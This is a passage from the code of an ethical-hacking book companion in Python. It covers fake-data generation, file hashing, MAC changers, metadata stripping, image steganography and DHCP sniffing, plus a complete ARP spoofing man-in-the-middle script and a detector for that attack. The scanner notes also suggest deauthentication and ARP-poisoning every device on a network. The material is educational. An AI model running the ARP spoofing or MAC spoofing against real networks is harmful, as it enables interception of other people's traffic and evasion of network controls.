| "date_of_birth": fake.date_of_birth(), 20 | "company": fake.company(), 21 | "job": fake.job(), 22 | "ssn": fake.ssn(), 23 | "phone_number": fake.phone_number(), 24 | "profile": fake.simple_profile() 25 | } 26 | return user_data 27 | 28 | # Example usage 29 | for _ in range(5): 30 | print("*"*50) 31 | pprint(generate_user_data()) 32 | -------------------------------------------------------------------------------- /chapter-4/fake-data-generation/requirements.txt: -------------------------------------------------------------------------------- 1 | faker -------------------------------------------------------------------------------- /chapter-4/file-integrity/README.md: -------------------------------------------------------------------------------- 1 | $ python verify_file_integrity.py 2 | File integrity verified. 3 | The SHA-256 hash of example.txt is: 9be104294df7d5a59c328241d49ac062e2c7b9660636e7f511e3a1dc3d919377 -------------------------------------------------------------------------------- /chapter-4/file-integrity/example.txt: -------------------------------------------------------------------------------- 1 | This is a text file. -------------------------------------------------------------------------------- /chapter-4/file-integrity/verify_file_integrity.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def compute_file_hash(file_path): 4 | """ 5 | Computes the SHA-256 hash of a file. 6 | 7 | Args: 8 | file_path (str): The path to the file whose hash is to be computed. 9 | 10 | Returns: 11 | str: The hexadecimal SHA-256 hash of the file. 12 | """ 13 | sha256_hash = hashlib.sha256() 14 | # Open the file in binary mode to read it 15 | with open(file_path, 'rb') as file: 16 | # Read and update hash string value in blocks of 4K 17 | for byte_block in iter(lambda: file.read(4096), b""): 18 | sha256_hash.update(byte_block) 19 | return sha256_hash.hexdigest() 20 | 21 | 22 | def verify_file_integrity(file_path, original_hash): 23 | """ 24 | Verifies the integrity of a file by comparing its current hash with the original hash. 25 | 26 | Args: 27 | file_path (str): The path to the file to check. 28 | original_hash (str): The original hash of the file for comparison. 29 | 30 | Returns: 31 | bool: True if the file's integrity is confirmed, False otherwise. 32 | """ 33 | current_hash = compute_file_hash(file_path) 34 | return current_hash == original_hash 35 | 36 | # Example usage 37 | # This should be the hash received or computed previously 38 | original_hash = "9be104294df7d5a59c328241d49ac062e2c7b9660636e7f511e3a1dc3d919377" 39 | file_path = 'example.txt' 40 | if verify_file_integrity(file_path, original_hash): 41 | print("File integrity verified.") 42 | else: 43 | print("File integrity compromised!") 44 | 45 | # Example usage 46 | file_path = 'example.txt' 47 | print(f"The SHA-256 hash of {file_path} is: {compute_file_hash(file_path)}") 48 | -------------------------------------------------------------------------------- /chapter-4/mac-address-changer/mac_address_changer_linux.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import string 3 | import random 4 | import re 5 | 6 | 7 | def get_random_mac_address(): 8 | """Generate and return a MAC address in the format of Linux""" 9 | # get the hexdigits uppercased 10 | uppercased_hexdigits = ''.join(set(string.hexdigits.upper())) 11 | # 2nd character must be 0, 2, 4, 6, 8, A, C, or E 12 | mac = "" 13 | for i in range(6): 14 | for j in range(2): 15 | if i == 0: 16 | mac += random.choice("02468ACE") 17 | else: 18 | mac += random.choice(uppercased_hexdigits) 19 | mac += ":" 20 | return mac.strip(":") 21 | 22 | 23 | def get_current_mac_address(iface): 24 | # use the ifconfig command to get the interface details, including the MAC address 25 | output = subprocess.check_output(f"ifconfig {iface}", shell=True).decode() 26 | return re.search("ether (.+) ", output).group().split()[1].strip() 27 | 28 | 29 | 30 | def change_mac_address(iface, new_mac_address): 31 | # disable the network interface 32 | subprocess.check_output(f"ifconfig {iface} down", shell=True) 33 | # change the MAC 34 | subprocess.check_output(f"ifconfig {iface} hw ether {new_mac_address}", shell=True) 35 | # enable the network interface again 36 | subprocess.check_output(f"ifconfig {iface} up", shell=True) 37 | 38 | 39 | if __name__ == "__main__": 40 | import argparse 41 | parser = argparse.ArgumentParser(description="Python Mac Changer on Linux") 42 | parser.add_argument("interface", help="The network interface name on Linux") 43 | parser.add_argument("-r", "--random", action="store_true", help="Whether to generate a random MAC address") 44 | parser.add_argument("-m", "--mac", help="The new MAC you want to change to") 45 | args = parser.parse_args() 46 | iface = args.interface 47 | if args.random: 48 | # if random parameter is set, generate a random MAC 49 | new_mac_address = get_random_mac_address() 50 | elif args.mac: 51 | # if mac is set, use it instead 52 | new_mac_address = args.mac 53 | # get the current MAC address 54 | old_mac_address = get_current_mac_address(iface) 55 | print("[*] Old MAC address:", old_mac_address) 56 | # change the MAC address 57 | change_mac_address(iface, new_mac_address) 58 | # check if it's really changed 59 | new_mac_address = get_current_mac_address(iface) 60 | print("[+] New MAC address:", new_mac_address) -------------------------------------------------------------------------------- /chapter-4/mac-address-changer/mac_address_changer_windows.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import regex as re 3 | import string 4 | import random 5 | 6 | # the registry path of network interfaces 7 | network_interface_reg_path = r"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}" 8 | # the transport name regular expression, looks like {AF1B45DB-B5D4-46D0-B4EA-3E18FA49BF5F} 9 | transport_name_regex = re.compile("{.+}") 10 | # the MAC address regular expression 11 | mac_address_regex = re.compile(r"([A-Z0-9]{2}[:-]){5}([A-Z0-9]{2})") 12 | 13 | def get_random_mac_address(): 14 | """Generate and return a MAC address in the format of WINDOWS""" 15 | # get the hexdigits uppercased 16 | uppercased_hexdigits = ''.join(set(string.hexdigits.upper())) 17 | # 2nd character must be 2, 4, A, or E 18 | return random.choice(uppercased_hexdigits) + random.choice("24AE") + "".join(random.sample(uppercased_hexdigits, k=10)) 19 | 20 | 21 | def clean_mac(mac): 22 | """Simple function to clean non hexadecimal characters from a MAC address 23 | mostly used to remove '-' and ':' from MAC addresses and also uppercase it""" 24 | return "".join(c for c in mac if c in string.hexdigits).upper() 25 | 26 | 27 | def get_connected_adapters_mac_address(): 28 | # make a list to collect connected adapter's MAC addresses along with the transport name 29 | connected_adapters_mac = [] 30 | # use the getmac command to extract 31 | for potential_mac in subprocess.check_output("getmac").decode().splitlines(): 32 | # parse the MAC address from the line 33 | mac_address = mac_address_regex.search(potential_mac) 34 | # parse the transport name from the line 35 | transport_name = transport_name_regex.search(potential_mac) 36 | if mac_address and transport_name: 37 | # if a MAC and transport name are found, add them to our list 38 | connected_adapters_mac.append((mac_address.group(), transport_name.group())) 39 | return connected_adapters_mac 40 | 41 | 42 | def get_user_adapter_choice(connected_adapters_mac): 43 | # print the available adapters 44 | for i, option in enumerate(connected_adapters_mac): 45 | print(f"#{i}: {option[0]}, {option[1]}") 46 | if len(connected_adapters_mac) <= 1: 47 | # when there is only one adapter, choose it immediately 48 | return connected_adapters_mac[0] 49 | # prompt the user to choose a network adapter index 50 | try: 51 | choice = int(input("Please choose the interface you want to change the MAC address:")) 52 | # return the target chosen adapter's MAC and transport name that we'll use later to search for our adapter 53 | # using the reg QUERY command 54 | return connected_adapters_mac[choice] 55 | except: 56 | # if -for whatever reason- an error is raised, just quit the script 57 | print("Not a valid choice, quitting...") 58 | exit() 59 | 60 | 61 | def change_mac_address(adapter_transport_name, new_mac_address): 62 | # use reg QUERY command to get available adapters from the registry 63 | output = subprocess.check_output(f"reg QUERY " + network_interface_reg_path.replace("\\\\", "\\")).decode() 64 | for interface in re.findall(rf"{network_interface_reg_path}\\\d+", output): 65 | # get the adapter index 66 | adapter_index = int(interface.split("\\")[-1]) 67 | interface_content = subprocess.check_output(f"reg QUERY {interface.strip()}").decode() 68 | if adapter_transport_name in interface_content: 69 | # if the transport name of the adapter is found on the output of the reg QUERY command 70 | # then this is the adapter we're looking for 71 | # change the MAC address using reg ADD command 72 | changing_mac_output = subprocess.check_output(f"reg add {interface} /v NetworkAddress /d {new_mac_address} /f").decode() 73 | # print the command output 74 | print(changing_mac_output) 75 | # break out of the loop as we're done 76 | break 77 | # return the index of the changed adapter's MAC address 78 | return adapter_index 79 | 80 | 81 | def disable_adapter(adapter_index): 82 | # use wmic command to disable our adapter so the MAC address change is reflected 83 | disable_output = subprocess.check_output(f"wmic path win32_networkadapter where index={adapter_index} call disable").decode() 84 | return disable_output 85 | 86 | 87 | def enable_adapter(adapter_index): 88 | # use wmic command to enable our adapter so the MAC address change is reflected 89 | enable_output = subprocess.check_output(f"wmic path win32_networkadapter where index={adapter_index} call enable").decode() 90 | return enable_output 91 | 92 | 93 | if __name__ == "__main__": 94 | import argparse 95 | parser = argparse.ArgumentParser(description="Python Windows MAC changer") 96 | parser.add_argument("-r", "--random", action="store_true", help="Whether to generate a random MAC address") 97 | parser.add_argument("-m", "--mac", help="The new MAC you want to change to") 98 | args = parser.parse_args() 99 | if args.random: 100 | # if random parameter is set, generate a random MAC 101 | new_mac_address = get_random_mac_address() 102 | elif args.mac: 103 | # if mac is set, use it after cleaning 104 | new_mac_address = clean_mac(args.mac) 105 | 106 | connected_adapters_mac = get_connected_adapters_mac_address() 107 | old_mac_address, target_transport_name = get_user_adapter_choice(connected_adapters_mac) 108 | print("[*] Old MAC address:", old_mac_address) 109 | adapter_index = change_mac_address(target_transport_name, new_mac_address) 110 | print("[+] Changed to:", new_mac_address) 111 | disable_adapter(adapter_index) 112 | print("[+] Adapter is disabled") 113 | enable_adapter(adapter_index) 114 | print("[+] Adapter is enabled again") -------------------------------------------------------------------------------- /chapter-4/mac-address-changer/requirements.txt: -------------------------------------------------------------------------------- 1 | regex -------------------------------------------------------------------------------- /chapter-4/remove-metadata/files/cleaned_example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/remove-metadata/files/cleaned_example.docx -------------------------------------------------------------------------------- /chapter-4/remove-metadata/files/cleaned_example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/remove-metadata/files/cleaned_example.pdf -------------------------------------------------------------------------------- /chapter-4/remove-metadata/files/example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/remove-metadata/files/example.docx -------------------------------------------------------------------------------- /chapter-4/remove-metadata/files/example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/remove-metadata/files/example.pdf -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_docx.py: -------------------------------------------------------------------------------- 1 | from docx import Document 2 | from datetime import datetime 3 | 4 | def remove_docx_metadata(docx_file, output_file): 5 | """Removes metadata from a docx file. 6 | 7 | Args: 8 | docx_file (str): The path to the input docx file. 9 | output_file (str): The path to save the cleaned docx file. 10 | 11 | Returns: 12 | None 13 | """ 14 | # Open the document 15 | doc = Document(docx_file) 16 | # Get the core properties 17 | core_props = doc.core_properties 18 | # Remove all metadata fields 19 | core_props.author = "" 20 | core_props.title = "" 21 | core_props.subject = "" 22 | core_props.creator = "" 23 | core_props.keywords = "" 24 | core_props.description = "" 25 | core_props.last_modified_by = "" 26 | # Reset revision to 1 27 | core_props.revision = 1 28 | # Remove language and version information 29 | core_props.language = "" 30 | core_props.version = "" 31 | # Set modified and created dates to a dummy date 32 | core_props.modified = core_props.created = datetime(1970, 1, 1) 33 | # Save the cleaned document 34 | doc.save(output_file) 35 | 36 | # Example usage: Remove metadata from 'example.docx' and save as 'cleaned_example.docx' 37 | remove_docx_metadata('files/example.docx', 'files/cleaned_example.docx') 38 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_images.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | def remove_image_metadata(image_file, output_file): 4 | """ 5 | Removes the metadata (EXIF data) from an image file. 6 | 7 | Args: 8 | image_file (str): The path to the input image file. 9 | output_file (str): The path to the output image file without metadata. 10 | 11 | Returns: 12 | None 13 | """ 14 | with Image.open(image_file) as img: 15 | # Get the image data 16 | data = img.getdata() 17 | 18 | # Create a new image without the EXIF data 19 | image_without_exif = Image.new(img.mode, img.size) 20 | image_without_exif.putdata(data) 21 | 22 | # Save the new image to the output file 23 | image_without_exif.save(output_file) 24 | 25 | # Example usage 26 | remove_image_metadata('files/image.jpg', 'files/cleaned_image.jpg') 27 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_media.py: -------------------------------------------------------------------------------- 1 | import ffmpeg 2 | 3 | def remove_media_metadata(media_file, output_file): 4 | """ 5 | Removes the metadata from a media file and saves it to a new file. 6 | 7 | Args: 8 | media_file (str): The path to the input media file. 9 | output_file (str): The path to the output media file where the cleaned version will be saved. 10 | 11 | Returns: 12 | None 13 | """ 14 | ( 15 | ffmpeg 16 | .input(media_file) 17 | .output(output_file, map_metadata=-1) 18 | .run() 19 | ) 20 | 21 | # Example usage 22 | # This code removes the metadata from the 'example.mp3' file 23 | # and saves the cleaned version to 'cleaned_example.mp3' 24 | remove_media_metadata('files/example.mp3', 'files/cleaned_example.mp3') 25 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_pdf.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | 3 | def remove_pdf_metadata(pdf_file, output_file): 4 | """ 5 | Removes all metadata from a PDF file. 6 | 7 | Args: 8 | pdf_file (str): The path to the input PDF file. 9 | output_file (str): The path to the output PDF file with metadata removed. 10 | 11 | Returns: 12 | None 13 | """ 14 | # Open the PDF file using the pikepdf library 15 | pdf = pikepdf.Pdf.open(pdf_file) 16 | 17 | # Open the PDF metadata and set the editor to False to avoid adding pikepdf as the editor 18 | with pdf.open_metadata(set_pikepdf_as_editor=False) as meta: 19 | # Get a list of all the metadata keys 20 | keys = list(meta.keys()) 21 | # Loop through the metadata keys and delete each one 22 | for key in keys: 23 | del meta[key] 24 | 25 | # Save the PDF file with the metadata removed 26 | pdf.save(output_file) 27 | # Close the PDF file 28 | pdf.close() 29 | 30 | # Example usage: Remove metadata from 'example.pdf' and save the result as 'cleaned_example.pdf' 31 | remove_pdf_metadata('files/example.pdf', 'files/cleaned_example.pdf') 32 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/requirements.txt: -------------------------------------------------------------------------------- 1 | ffmpeg-python 2 | Pillow 3 | pikepdf 4 | tinytag 5 | python-docx -------------------------------------------------------------------------------- /chapter-4/steganography/requirements.txt: -------------------------------------------------------------------------------- 1 | opencv-python 2 | numpy -------------------------------------------------------------------------------- /chapter-4/steganography/steganography.py: -------------------------------------------------------------------------------- 1 | import cv2 2 | import numpy as np 3 | import os 4 | 5 | def to_bin(data): 6 | """Convert `data` to binary format as string""" 7 | if isinstance(data, str): 8 | return ''.join([ format(ord(i), "08b") for i in data ]) 9 | elif isinstance(data, bytes): 10 | return ''.join([ format(i, "08b") for i in data ]) 11 | elif isinstance(data, np.ndarray): 12 | return [ format(i, "08b") for i in data ] 13 | elif isinstance(data, int) or isinstance(data, np.uint8): 14 | return format(data, "08b") 15 | else: 16 | raise TypeError("Type not supported.") 17 | 18 | 19 | def encode(image_name, secret_data, n_bits=2): 20 | # read the image 21 | image = cv2.imread(image_name) 22 | # maximum bytes to encode 23 | n_bytes = image.shape[0] * image.shape[1] * 3 * n_bits // 8 24 | print("[*] Maximum bytes to encode:", n_bytes) 25 | print("[*] Data size:", len(secret_data)) 26 | if len(secret_data) > n_bytes: 27 | raise ValueError(f"[!] Insufficient bytes ({len(secret_data)}), need bigger image or less data.") 28 | print("[*] Encoding data...") 29 | # add stopping criteria 30 | if isinstance(secret_data, str): 31 | secret_data += "=====" 32 | elif isinstance(secret_data, bytes): 33 | secret_data += b"=====" 34 | data_index = 0 35 | # convert data to binary 36 | binary_secret_data = to_bin(secret_data) 37 | # size of data to hide 38 | data_len = len(binary_secret_data) 39 | for bit in range(1, n_bits+1): 40 | for row in image: 41 | for pixel in row: 42 | # convert RGB values to binary format 43 | r, g, b = to_bin(pixel) 44 | # modify the least significant bit only if there is still data to store 45 | if data_index < data_len: 46 | if bit == 1: 47 | # least significant red pixel bit 48 | pixel[0] = int(r[:-bit] + binary_secret_data[data_index], 2) 49 | elif bit > 1: 50 | # replace the `bit` least significant bit of the red pixel with the data bit 51 | pixel[0] = int(r[:-bit] + binary_secret_data[data_index] + r[-bit+1:], 2) 52 | data_index += 1 53 | if data_index < data_len: 54 | if bit == 1: 55 | # least significant green pixel bit 56 | pixel[1] = int(g[:-bit] + binary_secret_data[data_index], 2) 57 | elif bit > 1: 58 | # replace the `bit` least significant bit of the green pixel with the data bit 59 | pixel[1] = int(g[:-bit] + binary_secret_data[data_index] + g[-bit+1:], 2) 60 | data_index += 1 61 | if data_index < data_len: 62 | if bit == 1: 63 | # least significant blue pixel bit 64 | pixel[2] = int(b[:-bit] + binary_secret_data[data_index], 2) 65 | elif bit > 1: 66 | # replace the `bit` least significant bit of the blue pixel with the data bit 67 | pixel[2] = int(b[:-bit] + binary_secret_data[data_index] + b[-bit+1:], 2) 68 | data_index += 1 69 | # if data is encoded, just break out of the loop 70 | if data_index >= data_len: 71 | break 72 | return image 73 | 74 | 75 | def decode(image_name, n_bits=1, in_bytes=False): 76 | print("[+] Decoding...") 77 | # read the image 78 | image = cv2.imread(image_name) 79 | binary_data = "" 80 | for bit in range(1, n_bits+1): 81 | for row in image: 82 | for pixel in row: 83 | r, g, b = to_bin(pixel) 84 | binary_data += r[-bit] 85 | binary_data += g[-bit] 86 | binary_data += b[-bit] 87 | 88 | # split by 8-bits 89 | all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ] 90 | # convert from bits to characters 91 | if in_bytes: 92 | # if the data we'll decode is binary data, 93 | # we initialize bytearray instead of string 94 | decoded_data = bytearray() 95 | for byte in all_bytes: 96 | # append the data after converting from binary 97 | decoded_data.append(int(byte, 2)) 98 | if decoded_data[-5:] == b"=====": 99 | # exit out of the loop if we find the stopping criteria 100 | break 101 | else: 102 | decoded_data = "" 103 | for byte in all_bytes: 104 | decoded_data += chr(int(byte, 2)) 105 | if decoded_data[-5:] == "=====": 106 | break 107 | return decoded_data[:-5] 108 | 109 | 110 | if __name__ == "__main__": 111 | import argparse 112 | parser = argparse.ArgumentParser(description="Steganography encoder/decoder, this Python scripts encode data within images.") 113 | parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding") 114 | parser.add_argument("-f", "--file", help="The file to hide into the image, this only should be specified while encoding") 115 | parser.add_argument("-e", "--encode", help="Encode the following image") 116 | parser.add_argument("-d", "--decode", help="Decode the following image") 117 | parser.add_argument("-b", "--n-bits", help="The number of least significant bits of the image to encode", type=int, default=2) 118 | 119 | args = parser.parse_args() 120 | if args.encode: 121 | # if the encode argument is specified 122 | if args.text: 123 | secret_data = args.text 124 | elif args.file: 125 | with open(args.file, "rb") as f: 126 | secret_data = f.read() 127 | input_image = args.encode 128 | # split the absolute path and the file 129 | path, file = os.path.split(input_image) 130 | # split the filename and the image extension 131 | filename, ext = file.split(".") 132 | output_image = os.path.join(path, f"{filename}_encoded.{ext}") 133 | # encode the data into the image 134 | encoded_image = encode(image_name=input_image, secret_data=secret_data, n_bits=args.n_bits) 135 | # save the output image (encoded image) 136 | cv2.imwrite(output_image, encoded_image) 137 | print("[+] Saved encoded image.") 138 | if args.decode: 139 | input_image = args.decode 140 | if args.file: 141 | # decode the secret data from the image and write it to file 142 | decoded_data = decode(input_image, n_bits=args.n_bits, in_bytes=True) 143 | with open(args.file, "wb") as f: 144 | f.write(decoded_data) 145 | print(f"[+] File decoded, {args.file} is saved successfully.") 146 | else: 147 | # decode the secret data from the image and print it in the console 148 | decoded_data = decode(input_image, n_bits=args.n_bits) 149 | print("[+] Decoded data:", decoded_data) -------------------------------------------------------------------------------- /chapter-5/advanced-network-scanner/notes.md: -------------------------------------------------------------------------------- 1 | # Ideas for Extending the Network Scanner 2 | 3 | - Add MAC Vendor lookup 4 | - Use Deauth to force a client to reconnect to the network, so you get the DHCP request 5 | - Add a new column to the dataframe for the ports that are open. 6 | - Add Latency to the dataframe, with the help of the `timeit` module, you can get the time it takes to receive the ICMP reply packet. 7 | - ARP Spoof all detected devices to monitor the entire traffic. 8 | - Use colorama to color the output, so you can easily distinguish the gateway, your device, and other devices. 9 | - https://stackoverflow.com/questions/65410481/filenotfounderror-errno-2-no-such-file-or-directory-bliblibc-a 10 | 11 | # Main features of the Advanced Network Scanner 12 | 13 | - Automatically detect the network subnet and mask. 14 | - Passively sniffing for packets 15 | - The ability to IP scan any online IP address range 16 | - UDP scanning 17 | - ICMP scanning 18 | - DHCP Listening 19 | 20 | # General Notes 21 | 22 | - You can uncomment the prints, even though you should use logging in a large program like that instead of simple prints -------------------------------------------------------------------------------- /chapter-5/advanced-network-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | pandas -------------------------------------------------------------------------------- /chapter-5/arp-spoof/arp_spoof.py: -------------------------------------------------------------------------------- 1 | from scapy.all import Ether, ARP, srp, send 2 | import argparse 3 | import time 4 | import os 5 | 6 | def _enable_linux_iproute(): 7 | """Enables IP route ( IP Forward ) in linux-based distro""" 8 | file_path = "/proc/sys/net/ipv4/ip_forward" 9 | with open(file_path) as f: 10 | if f.read() == 1: 11 | # already enabled 12 | return 13 | with open(file_path, "w") as f: 14 | print(1, file=f) 15 | 16 | 17 | def _enable_windows_iproute(): 18 | """Enables IP route (IP Forwarding) in Windows""" 19 | from services import WService 20 | # enable Remote Access service 21 | service = WService("RemoteAccess") 22 | service.start() 23 | 24 | 25 | def enable_ip_route(verbose=True): 26 | """Enables IP forwarding""" 27 | if verbose: 28 | print("[!] Enabling IP Routing...") 29 | _enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute() 30 | if verbose: 31 | print("[!] IP Routing enabled.") 32 | 33 | 34 | def get_mac(ip): 35 | """Returns MAC address of any device connected to the network 36 | If ip is down, returns None instead""" 37 | ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) 38 | if ans: 39 | return ans[0][1].src 40 | 41 | 42 | def spoof(target_ip, host_ip, verbose=True): 43 | """Spoofs `target_ip` saying that we are `host_ip`. 44 | it is accomplished by changing the ARP cache of the target (poisoning)""" 45 | # get the mac address of the target 46 | target_mac = get_mac(target_ip) 47 | # craft the arp 'is-at' operation packet, in other words; an ARP response 48 | # we don't specify 'hwsrc' (source MAC address) 49 | # because by default, 'hwsrc' is the real MAC address of the sender (ours) 50 | arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') 51 | # send the packet 52 | # verbose = 0 means that we send the packet without printing any thing 53 | send(arp_response, verbose=0) 54 | if verbose: 55 | # get the MAC address of the default interface we are using 56 | self_mac = ARP().hwsrc 57 | print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) 58 | 59 | 60 | def restore(target_ip, host_ip, verbose=True): 61 | """Restores the normal process of a regular network 62 | This is done by sending the original informations 63 | (real IP and MAC of `host_ip` ) to `target_ip`""" 64 | # get the real MAC address of target 65 | target_mac = get_mac(target_ip) 66 | # get the real MAC address of spoofed (gateway, i.e router) 67 | host_mac = get_mac(host_ip) 68 | # crafting the restoring packet 69 | arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at") 70 | # sending the restoring packet 71 | # to restore the network to its normal process 72 | # we send each reply seven times for a good measure (count=7) 73 | send(arp_response, verbose=0, count=7) 74 | if verbose: 75 | print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) 76 | 77 | 78 | def arpspoof(target, host, verbose=True): 79 | """Performs an ARP spoof attack""" 80 | # enable IP forwarding 81 | enable_ip_route() 82 | try: 83 | while True: 84 | # telling the `target` that we are the `host` 85 | spoof(target, host, verbose) 86 | # telling the `host` that we are the `target` 87 | spoof(host, target, verbose) 88 | # sleep for one second 89 | time.sleep(1) 90 | except KeyboardInterrupt: 91 | print("[!] Detected CTRL+C ! restoring the network, please wait...") 92 | # restoring the network 93 | restore(target, host) 94 | restore(host, target) 95 | 96 | 97 | if __name__ == "__main__": 98 | parser = argparse.ArgumentParser(description="ARP spoof script") 99 | parser.add_argument("target", help="Victim IP Address to ARP poison") 100 | parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)") 101 | parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)") 102 | args = parser.parse_args() 103 | target, host, verbose = args.target, args.host, args.verbose 104 | # start the attack 105 | arpspoof(target, host, verbose) 106 | -------------------------------------------------------------------------------- /chapter-5/arp-spoof/output.md: -------------------------------------------------------------------------------- 1 | python arp_spoof.py 192.168.1.100 192.168.1.1 --verbose -------------------------------------------------------------------------------- /chapter-5/arp-spoof/requirements.txt: -------------------------------------------------------------------------------- 1 | pywin32 2 | scapy -------------------------------------------------------------------------------- /chapter-5/arp-spoof/services.py: -------------------------------------------------------------------------------- 1 | import win32serviceutil 2 | import time 3 | 4 | 5 | class WService: 6 | 7 | def __init__(self, service, machine=None, verbose=False): 8 | self.service = service 9 | self.machine = machine 10 | self.verbose = verbose 11 | 12 | @property 13 | def running(self): 14 | return win32serviceutil.QueryServiceStatus(self.service)[1] == 4 15 | 16 | def start(self): 17 | if not self.running: 18 | win32serviceutil.StartService(self.service) 19 | time.sleep(1) 20 | # check if service is running 21 | if self.running: 22 | # service is running 23 | if self.verbose: 24 | print(f"[+] {self.service} started successfully.") 25 | return True 26 | else: 27 | # service is not running 28 | if self.verbose: 29 | print(f"[-] Cannot start {self.service}") 30 | return False 31 | elif self.verbose: 32 | print(f"[!] {self.service} is already running.") 33 | 34 | def stop(self): 35 | if self.running: 36 | win32serviceutil.StopService(self.service) 37 | time.sleep(0.5) 38 | if not self.running: 39 | if self.verbose: 40 | print(f"[+] {self.service} stopped successfully.") 41 | return True 42 | else: 43 | if self.verbose: 44 | print(f"[-] Cannot stop {self.service}") 45 | return False 46 | elif self.verbose: 47 | print(f"[!] {self.service} is not running.") 48 | 49 | def restart(self): 50 | if self.running: 51 | win32serviceutil.RestartService(self.service) 52 | time.sleep(2) 53 | if self.running: 54 | if self.verbose: 55 | print(f"[+] {self.service} restarted successfully.") 56 | return True 57 | else: 58 | if self.verbose: 59 | print(f"[-] Cannot start {self.service}") 60 | return False 61 | elif self.verbose: 62 | print(f"[!] {self.service} is not running.") 63 | 64 | 65 | def main(action, service): 66 | service = WService(service, verbose=True) 67 | if action == "start": 68 | service.start() 69 | elif action == "stop": 70 | service.stop() 71 | elif action == "restart": 72 | service.restart() 73 | 74 | # getattr(remoteAccessService, action, "start")() 75 | 76 | if __name__ == "__main__": 77 | import argparse 78 | parser = argparse.ArgumentParser(description="Windows Service Handler") 79 | parser.add_argument("service") 80 | parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'", 81 | action="store", required=True, dest="action") 82 | 83 | given_args = parser.parse_args() 84 | 85 | service, action = given_args.service, given_args.action 86 | 87 | main(action, service) 88 | 89 | -------------------------------------------------------------------------------- /chapter-5/detect-arp-spoof/arp_spoof_detector.py: -------------------------------------------------------------------------------- 1 | from scapy.all import Ether, ARP, srp, sniff, conf 2 | 3 | def get_mac(ip): 4 | """Returns the MAC address of `ip`, if it is unable to find it 5 | for some reason, throws `IndexError`""" 6 | p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip) 7 | result = srp(p, timeout=3, verbose=False)[0] 8 | return result[0][1].hwsrc 9 | 10 | 11 | def process(packet): 12 | """Processes a single ARP packet, if it is an ARP response and 13 | the real MAC address of the target is different from the one 14 | in the ARP response, prints a warning""" 15 | # if the packet is an ARP packet 16 | if packet.haslayer(ARP): 17 | # if it is an ARP response (ARP reply) 18 | if packet[ARP].op == 2: 19 | try: 20 | # get the real MAC address of the sender 21 | real_mac = get_mac(packet[ARP].psrc) 22 | # get the MAC address from the packet sent to us 23 | response_mac = packet[ARP].hwsrc 24 | # if they're different, definetely there is an attack 25 | if real_mac != response_mac: 26 | print(f"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}") 27 | except IndexError: 28 | # unable to find the real mac 29 | # may be a fake IP or firewall is blocking packets 30 | pass 31 | 32 | 33 | if __name__ == "__main__": 34 | import sys 35 | try: 36 | iface = sys.argv[1] 37 | except IndexError: 38 | iface = conf.iface 39 | sniff(store=False, prn=process, iface=iface) -------------------------------------------------------------------------------- /chapter-5/detect-arp-spoof/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/dhcp-listener/dhcp_listener.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import time 3 | 4 | 5 | def listen_dhcp(): 6 | # Make sure it is DHCP with the filter options 7 | sniff(prn=print_packet, filter='udp and (port 67 or port 68)') 8 | 9 | 10 | def print_packet(packet): 11 | # initialize these variables to None at first 12 | target_mac, requested_ip, hostname, vendor_id = [None] * 4 13 | # get the MAC address of the requester 14 | if packet.haslayer(Ether): 15 | target_mac = packet.getlayer(Ether).src 16 | # get the DHCP options 17 | dhcp_options = packet[DHCP].options 18 | for item in dhcp_options: 19 | try: 20 | label, value = item 21 | except ValueError: 22 | continue 23 | if label == 'requested_addr': 24 | # get the requested IP 25 | requested_ip = value 26 | elif label == 'hostname': 27 | # get the hostname of the device 28 | hostname = value.decode() 29 | elif label == 'vendor_class_id': 30 | # get the vendor ID 31 | vendor_id = value.decode() 32 | if target_mac and vendor_id and hostname and requested_ip: 33 | # if all variables are not None, print the device details 34 | time_now = time.strftime("[%Y-%m-%d - %H:%M:%S]") 35 | print(f"{time_now} : {target_mac} - {hostname} / {vendor_id} requested {requested_ip}") 36 | 37 | 38 | if __name__ == "__main__": 39 | listen_dhcp() 40 | 41 | -------------------------------------------------------------------------------- /chapter-5/dhcp-listener/output.md: -------------------------------------------------------------------------------- 1 